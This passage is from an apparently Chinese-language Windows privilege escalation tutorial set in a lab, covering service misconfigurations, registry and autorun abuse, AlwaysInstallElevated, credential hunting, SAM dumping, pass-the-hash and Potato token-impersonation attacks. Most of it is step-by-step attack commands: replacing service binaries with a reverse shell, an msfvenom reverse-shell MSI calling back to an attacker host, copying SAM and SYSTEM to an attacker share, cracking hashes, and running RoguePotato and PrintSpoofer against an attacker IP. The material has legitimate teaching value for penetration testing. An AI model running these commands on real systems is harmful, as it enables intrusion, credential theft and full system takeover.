C:\Users\user\Desktop> .\accesschk.exe /accepteula -uwcqv user daclsvc                                                                
C:\Users\user\Desktop> .\accesschk.exe /accepteula -uwcqv user daclsvc 
RW daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

5. 检查服务的当前配置:

sc qc daclsvc

6.重新配置服务以使用我们的反向壳可执行:

sc config daclsvc binpath=  "\"C:\Users\user\Desktop\a002.exe\""

7.启动服务触发漏洞进行反弹shell

net start daclsvc

2. 未引用的服务路径

前言

Windows中的可执行项无需使用扩展即可运行(例如,"whoami.exe"可以通过键入"whoami"来运行)。

一些可执行者采取参数,由空间分开,例如一些程序.exe arg1 arg2 arg3.。。

当使用未引用且包含空格的绝对路径时,此行为会导致歧义的发生

举例以下未引用的路径:

C:\Program Files\Some Dir\SomeProgram.exe

表面来看,这显然运行SomeProgram.exe

对 Windows来说,C:\Program 可能是可执行的,有两个参数:"Files\Some" and "Dir\ SomeProgram.exe"

Windows 通过依次检查每个可能性来解决此歧义。

如果我们可以在实际可执行之前攻击 Windows 检查的位置,我们可以欺骗服务执行它。

实操

1.运行winPEAS以检查服务配置错误:

.\winPEASany.exe quiet servicesinfo

2. 发现"unquotedsvc"服务有一个未引用的路径 ,其中也 包含 空格:

C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

3. 使用sc确认此问题:

sc qc unquotedsvc

4.使用accesschk.exe检查写入权限:

.\accesschk.exe /accepteula -uwdq C:\ .\accesschk.exe /accepteula -uwdq "C:\Program Files\" .\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

5.复制可执行的反向外壳并适当重命名

copy C:\Users\user\Desktop\a002.exe "C:\Program Files\Unquoted Path Service\Common.exe"

6.启动服务触发漏洞进行反弹shell

net start unquotedsvc

3. 注册表权限弱

前言

每个服务的窗口注册表存储条目。

由于注册表条目可能具有 ACL,如果 ACL 配置错误,即使我们不能直接修改服务,也有可能修改服务的配置。

实操

1.运行 winPEAS以检查服务配置错误:

.\winPEASany.exe quiet servicesinfo

2.发现"regsvc"服务的注册表输入较弱。我们可以用电源壳确认这一点:

Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List

3. 或者 ,也可以使用accesschk.exe 来 确认:

.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

4.覆盖图像路径注册表密钥,以指向我们的反向外壳可执行:

reg add  HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Users\user\Desktop\a002.exe /f

5.启动服务触发漏洞进行反弹shell

net start regsvc

4. 不安全的服务可执行

前言

如果可执行的原始服务可由我们的用户修改,我们可以简单地用可执行的反向壳替换它。

请记住,如果您在真实系统中利用此备份,请创建原始可执行的备份

实操

1.运行winPEAS以检查服务配置错误: 问题

.\winPEASany.exe quiet servicesinfo

2.发现"filepermsvc"服务具有可执行项,似乎每个人都可以执行。我们可以用accesschk.exe 来确认这一点:

.\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

3.创建可执行的原始服务的备份:

copy "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Temp

4.复制可执行的反向外壳,以覆盖可执行的服务:

copy /Y C:\Users\user\Desktop\a002.exe "C:\Program Files\File Permissions Service\filepermservice.exe"

5.启动服务触发漏洞进行反弹shell:

net start filepermsvc

0x06 注册表

前言

Windows可以配置为在启动时运行命令, 拥有更高的特权。

这些“自动运行”是在注册表中配置的。 如果我们可以写入自动运行可执行文件,并且

能够重新启动系统(或等待系统重新启动),可能会提升权限

实操

1.使用winPEAS 检查系统签发的自动运行可执行文件:

.\winPEASany.exe quiet applicationsinfo

2.或者,我们可以手动列举自动运行可执行项:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

然后使用accesschk.exe来 验证每个权限 :

.\accesschk.exe /accepteula -wvu "C:\Program  Files\Autorun Program\program.exe"

3.发现"C:\Program Files\Autorun Program\program.exe"自运行,可执行且可写入

创建原始备份:

copy "C:\Program Files\Autorun Program\program.exe" C:\Temp

4.用反向外壳去覆盖可执行的自运行:

copy /Y C:\Users\user\Desktop\a002.exe "C:\Program Files\Autorun Program\program.exe"

5.重启虚拟机进行反弹shell

这里要注意:

在 Windows 10 上,该漏洞似乎与上次登录的用户的权限一起运行,因此请注销"用户"帐户并首先登录为"管理员"帐户。

0x07始终安装相关

前言

MSI 文件是用于安装应用程序的包文件。

这些文件运行时会获得尝试安装它们的用户的权限。

Windows允许使用高架(即管理员)权限运行这些安装程序。

如果是这样的话,我们可以生成一个包含反向外壳的MSI文件。

关键是必须启用两个注册处设置才能实现此功能。

本地机器的"始终安装"值必须设置为 1:

local machine:HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

current user:HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

如果其中任何一个不是1或被禁用,则漏洞将不起作用。

实操

1.使用winPEAS 查看是否设置了两个注册表值:

.\winPEASany.exe quiet windowscreds

2. 或者,手动验证值:

reg query  HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer  /v AlwaysInstallElevated
reg query  HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer  /v AlwaysInstallElevated

3.使用msfvenom创建反向外壳

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.175.130 LPORT=4444 -f msi -o a001.msi

4.上传a001.msi到靶机,并在Kali上启动一个监听,并运行安装程序以触发漏洞:

msiexec /quiet /qn /i C:\Users\user\Desktop\a001.msi

0x08密码

前言

管理员也会重复使用密码,或将其密码保留在一些可读位置的系统上。

Windows 可能特别容易受到此影响,因为 Windows 存储密码的几个功能不安全

注册表

前言

大量程序在Windows注册表中存储配置选项。

Windows 本身有时会在注册处以纯文本存储密码。

我们可以在注册表处搜索密码

搜索注册表处的密码

以下命令将搜索注册表中包含"密码"的密钥和值

reg query HKLM /f password /t REG_SZ /s  #本地机器注册表项reg query HKCU /f password /t REG_SZ /s #当前用户注册表项

实操

1.使用winPEAS 检查常见密码位置:

.\winPEASany.exe quiet filesinfo userinfo

(最终检查需要很长时间才能完成)

2.查看信息

3.我们可以手动验证这些:(查询注册表)

reg query "HKLM\Software\Microsoft\Windows  NT\CurrentVersion\winlogon" reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s

4.使用 winexe 使用凭据远程连接外壳

winexe -U 'admin%password123' //192.168.175.245 cmd.exewinexe -U 'admin%password123' --system //192.168.175.245 cmd.exe

针对winexe的连接报错

Win7上修改1.关闭防火墙;2.Win+R>secpol.msc >本地策略>安全选项>网络访问:本地帐户的共享和安全模型:经典-对本地用户进行身份验证,不改变其本来身份;3.以管理员身份执行cmd,输入以下命令:reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

信用

Windows 具有runas 命令,允许用户使用其他用户的权限运行命令。

这通常需要了解其他用户的密码。

但是,Windows 还允许用户将其凭据保存到系统,这些保存的凭据可用于绕过此要求。

那么我们可以尝试去窃取这些凭据

1.使用winPEAS检查保存的凭据:

.\winPEASany.exe quiet cmd windowscreds

2. 似乎存在为管理员用户保存的凭据

3.我们可以使用以下命令手动验证此命令

cmdkey /list

4.如果未保存的凭据,则运行以下脚本以刷新凭据:

savecred.bat 

5.使用保存的凭据作为管理员用户运行任何命令,进行反弹shell 问题

runas /savecred /user:admin C:\Users\user\Desktop\a002.exe

配置文件

前言

某些管理员会在系统上留下包含密码的配置文件

Unattend.xml文件就是一个例子

它允许对 Windows 系统进行大部分自动化设置

搜索配置文件

递归式搜索当前目录中以pass为名的文件,或以.config结尾:

dir /s *pass* == *.config

递归式搜索当前目录中包含"password"一词的文件,最后也以任何一个.xml,.ini,.txt

findstr /si password *.xml *.ini *.txt

实操

1.使用winPEAS 搜索可能包含凭据的常见文件:

.\winPEASany.exe quiet cmd searchfast filesinfo

2. 发现Unattend.xml文件

type C:\Windows\Panther\Unattend.xml

3. 发现了管理员用户的账号密码

它是base64编码的

cGFzc3dvcmQxMjM=Admin

4. 在kali进行解码:

echo "cGFzc3dvcmQxMjM=" | base64 -d

5. 使用winexe进行反弹shell

winexe -U 'admin%password123' //192.168.175.245 cmd.exe

SAM

前言

Windows 在安全帐户管理器 (SAM) 中存储密码。

这些哈希用一个密钥加密,该密钥可以在SYSTEM的文件中找到。

如果您有能力读取SAM和系统文件,则可以提取哈希

SAM/SYSTEM Locations

SAM和SYSTEM文件位于C:\Windows\System32\config directory

在 Windows 运行时,文件已锁定。

文件的备份可能存在于C:\Windows\RepairorC:\Windows\System32\config\RegBack directories

实操

1. SAM和SYSTEM文件的备份进行读取

2. 进行复制

copy C:\Windows\Repair\SAM  \\192.168.175.130\tools\ copy C:\Windows\Repair\SYSTEM  \\192.168.175.130\tools\

3. 下载信用套件:

git clone https://github.com/Neohapsis/creddump7.git

4. 运行对SAM和系统文件的工具来提取哈希:

python2 creddump7/pwdump.py SYSTEM SAM

5.使用hashcat破解管理员用户哈希:

hashcat -m 1000 --force  a9fdfa038c4b75ebc76dc855dd74f0da  /usr/share/wordlists/rockyou.txt

Hash

前言

Windows 接受哈希斯而不是密码来验证许多服务。

我们可以使用经过修改的winexe,即pth-winexe,使用管理员用户的哈希生成命令提示

实操

1. 从上一步中的SAM中提取管理员哈希。

2. 使用带pth-winexe 的哈希来生成命令提示:

pth-winexe -U  'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c 4b75ebc76dc855dd74f0da' //192.168.175.228 cmd.exe

3. 使用带pth-winexe的哈希产生SYSTEM

pth-winexe --system -U  'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c 4b75ebc76dc855dd74f0da' //192.168.175.228 cmd.exe

0x09Scheduled Tasks

预定任务

前言

Windows 可以配置为在特定时间(例如 每 5 分钟)或由某个事件触发(例如用户登录)运行任务。

任务通常使用创建它们的用户的权限运行,但管理员可以配置以其他用户(包括系统)身份运行

基本命令

没有简单的方法来枚举属于其他用户作为低特权用户帐户。

列出用户可以看到的所有计划任务:

schtasks /query /fo LIST /v

在PowerShell中:

Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

通常我们必须依赖于其他条件,例如找到一个脚本或日志文件来指示正在运行计划任务。

实操

1. 在C:\DevTools目录中,有一个名为CleanUp.ps1的PowerShell脚本。查看脚本:

type C:\DevTools\CleanUp.ps1

2. 此脚本似乎以系统用户的身份运行每分钟。我们可以使用accesschk.exe检查本脚本权限

C:\Users\user\Desktop\accesschk.exe /accepteula -quvw user  C:\DevTools\CleanUp.ps1

看来我们有能力写到这个文件。

3. 备份脚本:

copy C:\DevTools\CleanUp.ps1 C:\Temp\

4. kali进行监听

5. 使用echo将对反向shell可执行文件的调用附加到脚本末尾:

echo C:\Users\user\Desktop\a002.exe >>  C:\DevTools\CleanUp.ps1

6. 等待预定任务运行(它应该运行每分钟)进行反弹shell

不安全的 GUI 应用程序

前言

在某些(较旧)版本的 Windows 中,用户可以获得使用管理员权限运行某些 GUI 应用的权限。

通常有许多方法可以生成来自GUI应用内的命令提示,包括使用原生 Windows 功能。

Since 父过程运行时具有管理员权限,生成的命令提示也将运行这些权限

实操

1. 使用user的GUI登录Windows虚拟机 账户

2. 双击桌面上的"AdminPaint"快捷方式

3. 打开cmd并运行:

tasklist /V | findstr mspaint.exe

可以看到这个mspaint.exe是运行管理员的特权

4. 在 绘图中, 单击"文件",然后 打开。

5.在导航输入中,将内容替换为:

file://c:/windows/system32/cmd.exe

命令提示符应该打开以管理员权限运行

0x10启动应用程序

前言

每个用户都可以通过设置特定目录中的快捷方式。

Windows还有一个应用程序的启动目录,所有应用程序都应该启动

用户:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp 

如果我们可以在这个目录中创建文件,我们就可以使用反弹shell

管理员登录时可执行和升级权限。

这里我们要注意:必须使用快捷方式文件.lnk

提供一个VBScript脚本进行创建快捷方式文件

Set oWS = WScript.CreateObject("WScript.Shell") sLinkFile = "C:\ProgramData\Microsoft\Windows\Start  Menu\Programs\StartUp\reverse.lnk" Set oLink = oWS.CreateShortcut(sLinkFile) oLink.TargetPath = "C:\Users\user\Desktop\a002.exe" oLink.Save

实操

1.使用accesschk.exe检查启动时的权限目录:

.\accesschk.exe /accepteula -d  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

2.建立用户组可以编写此目录的访问

3.使用VBScript创建文件CreateShortcut.vbs

可以更改文件的路径

4.使用cscript运行脚本

cscript CreateShortcut.vbs

5.进行反弹shell

0x11已安装的应用程序

前言

与已安装应用程序相关的大多数权限升级都基于我们已经涵盖的错误的配置。

不过,一些权限升级是缓冲区溢出等结果,因此知道如何识别已安装的应用程序和已知漏洞仍然很重要

基本命令

手动列举所有运行程序:

tasklist /v

我们还可以使用Seatbelt搜索非标准流程:

.\seatbelt.exe NonstandardProcesses

winPEASany也可以

.\winPEASany.exe quiet procesinfo

0x12Hot Potato

前言

Hot Potato是使用欺骗攻击的攻击的名称

同时进行NTLM中继攻击以获得系统权限。

该攻击诱使Windows作为系统进行身份验证

用户使用NTLM访问一个假的HTTP服务器。NTLM凭据

然后NTLM凭据将其转告到SMB以获得命令执行。

漏洞范围

此攻击适用于Windows 7、8和早期版本的Windows 10

实操(win7)

1.将potato.exe复制到Windows上.

2.开启kali的监听

3.运行exp

.\potato.exe -ip 192.168.175.228 -cmd "C:\Users\user\Desktop\a002.exe" - enable_httpserver true -enable_defender true -enable_spoof true - enable_exhaust true

4. 等待Windows Defender更新,或手动触发更新

令牌模拟

服务账户

可以为服务帐户授予特权,但是无法直接登录。

在服务中发现问题帐户,使其更易于升级权限。

Rotten Potato

服务帐户可以拦截系统票证并使用它模拟系统用户

因为服务帐户通常具有SeImpersonatePrivilege特权已启用。

SeImpersonate / SeAssignPrimaryToken

服务帐户通常配置这两个特权。

它们允许帐户模拟其他用户(包括系统用户)。

具有这些权限的任何用户都可以运行令牌

Juicy Potato(烂土豆)

https://github.com/ohpe/juicy-potato

这里就不细写了 用的太多了

Rogue Potato

GitHub: https://github.com/antonioCoco/RoguePotato

Blog: https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato

Compiled Exploit: https://github.com/antonioCoco/RoguePotato/releases

实操

1.复制PSExec64.exe和RoguePotato.exe到Windows上

2. 在Kali上设置socat重定向器,进行端口转发

sudo socat tcp-listen:135,reuseaddr,fork tcp:192.168.175.228:9999192.168.175.228:是靶机的IP

3.kali开启监听

4. 使用管理员命令提示,使用 PSExec64.exe 触发作为本地服务帐户运行的反向外壳:

C:\PrivEsc\PSExec64.exe /accepteula -i -u "nt authority\local service" C:\Users\user\Desktop\a002.exe

5. kali开启另一个监听

6.现在运行RoguePotato.exe漏洞触发进行反弹shell

C:\PrivEsc\RoguePotato.exe -r 192.168.175.130 –l  9999 -e "C:\Users\user\Desktop\a002.exe"192.168.175.130:是kali的IP

PrintSpoofer

前言

PrintSpoofer是一种针对打印后台处理程序服务的攻击

GitHub: https://github.com/itm4n/PrintSpoofer

Blog: https://itm4n.github.io/printspoofer-abusing-impersonate-privileges

最新的打印机漏洞:https://www.4hou.com/posts/4VB6

实操

1. 复制PSExec64.exe和PrintSpoofer.exe可执行到Windows上

2. 在kali开启监听

3. 使用管理员命令提示,使用 PSExec64.exe触发作为本地服务帐户运行的反向外壳:

C:\PrivEsc\PSExec64.exe /accepteula -i -u  "nt authority\local service"  C:\Users\user\Desktop\a002.exe

4. 在kali开启另一个监听

5.现在运行打印应用漏洞,以触发具有系统权限的反向外壳运行:

C:\PrivEsc\PrintSpoofer.exe –i - c "C:\Users\user\Desktop\a002.exe"

端口转发

前言

有时在 Kali 上运行漏洞代码更容易,但易受攻击的程序是在内部端口上收听

在这些情况下 ,我们需要将kali端口转发到 Windows 上的内部端口

我们可以使用plink.exe来自Putty 的makers来做到这一点

plink.exe

plink.exe的端口转发命令的一般格式

plink.exe <user>@<kali> -R <kaliport>:<target-IP>:<target-port>

<目标-IP>通常是本地的(例如 127.0.0.1)

plink.exe要求您将SSH转到kali,然后使用SSH隧道转发端口。

实操

1.使用winexe远程登录

winexe -U 'admin%password123'  //192.168.175.228 cmd.exe

2. 使用管理员命令提示, 重新启用 防火墙:

netsh advfirewall set allprofiles state on

3. 确认winexe命令现在已失效。

4.将plink .exe文件复制到 Windows,然后在 Kali上kill掉SMB 服务器

5. 确保Kali上的 SSH 服务器正在运行并接受root登录。

检查/etc/ssh/sshd_config中未注释PermitRootLogin yes选项。

如有必要,请重新启动 SSH 服务。

6. 在 Windows 上,使用 plink.exe将 Kali 上的端口 445 转发到Windows端口 445:

plink.exe root@192.168.175.130 -R 445:127.0.0.1:445

####在 Kali 上,修改winexe 命令以指向本地托架(或 127.0.0.1),然后执行该命令以通过端口向前获取

winexe -U 'admin%password123' //localhost cmd.exe

getsystem(命名管道和令牌复制)

访问令牌

访问令牌是Windows中存储用户权限的特殊对象身份和特权。

主访问令牌–在用户登录时创建,绑定到当前用户会话。

当用户启动一个新进程时,他们的主进程访问令牌被复制并附加到新进程。

模拟访问令牌–在进程或线程需要时创建临时与另一个用户的安全上下文一起运行。

令牌复制

Windows允许 processes/threads复制它们的访问令牌。

模拟访问令牌可以这样复制到主访问令牌中。

如果我们可以注入一个进程,我们就可以使用这个功能 复制进程的访问令牌,并生成具有相同权限的独立进程

您可能已经熟悉 Windows 和 Linux 中的"管道"概念:

命令管道

systeminfo | findstr Windows

进程可以创建命名管道,其他进程可以打开命名管道从中读取或写入数据的管道。

创建命名管道的进程可以模拟安全上下文连接到命名管道的进程的。

getsystem

msf中的getsystem很神奇 可能会直接提到system权限

用户权限

前言

在Windows中,可以为用户帐户和组分配特定的“特权”。

这些特权授予对某些能力的访问权。其中一些能力可以用来将我们的总体特权提升到系统的权限。

列出用户权限

whoami /all

SeImpersonatePrivilege

可以使用烂土豆

SeAssignPrimaryPrivilege

可以使用烂土豆

SeAssignPrimaryPrivilege

可以使用烂土豆

SeBackupPrivilege

授予对所有对象的读取权限

在系统上,不管他们的ACL使用此权限,用户可以访问敏感的或者从注册表中提取哈希值

然后进行破解或用于传递散列攻击。

SeRestorePrivilege

SeRestorePrivilege授予对系统上所有对象的写访问权,而不管它们的ACL如何。

滥用特权的三种方式:

修改服务二进制文件

覆盖系统进程使用的DLL

修改注册表设置

SeTakeOwnershipPrivilege

SeTakeOwnershipPrivilege允许用户取得所有权,在对象上(写入所有者权限)

一旦您拥有一个对象,就可以修改它的ACL并授予你自己写访问权限

与SeRestorePrivilege使用的方法相同

其他特权(更高级)

SeTcbPrivilege

SeCreateTokenPrivilege

SeLoadDriverPrivilege

SeDebugPrivilege (used by getsystem)

权限提升策略

1.检查用户(whoami)和组(net user<username>)

2.运行winPEAS

3.同时运行安全带和其他脚本!

最后给大家留一个备忘录:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

最后请大家谨记网络安全法,遵纪守法,不要擅自做违法的事情,后果自负!

希望此文对大家有帮助!

PreviousLinux提权Next信息收集

Last updated 3 years ago

Was this helpful?